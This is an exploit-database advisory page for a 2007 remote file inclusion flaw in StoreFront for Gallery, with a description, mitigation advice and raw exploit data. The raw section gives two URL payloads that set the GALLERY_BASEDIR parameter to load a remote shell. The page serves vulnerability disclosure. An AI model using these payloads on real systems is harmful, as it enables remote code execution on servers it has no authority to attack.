header-logo
Suggest Exploit
vendor:
StoreFront for Gallery
by:
Alkomandoz Hacker
7.5
CVSS
HIGH
Remote File Inclusion
CWE
Product Name: StoreFront for Gallery
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

StoreFront for Gallery (GALLERY_BASEDIR) Remote File Inclusion Vulnerabilities

The vulnerability allows an attacker to include remote files by manipulating the 'GALLERY_BASEDIR' parameter in the 'business_functions.php' and 'ui_functions.php' scripts. This can lead to remote code execution and unauthorized access to sensitive information.

Mitigation:

Update to a patched version of StoreFront for Gallery. Verify that user input is properly sanitized and validated before including files.
Source

Exploit-DB raw data:

StoreFront for Gallery (GALLERY_BASEDIR) Remote File Inclusion Vulnerabilities

D.Script: http://www.dalton.net/ppstorefront/ppstorefront.zip

Discovered by: Alkomandoz Hacker

Homepage: http://Www.asb-may.net

Exploit:

mods/business_functions.php?GALLERY_BASEDIR=Shell

mods/ui_functions.php?GALLERY_BASEDIR=Shell

Greetz To: Asb-May.Net/bb

# milw0rm.com [2007-04-16]

Navigation

Suggest Exploit

Services By CQR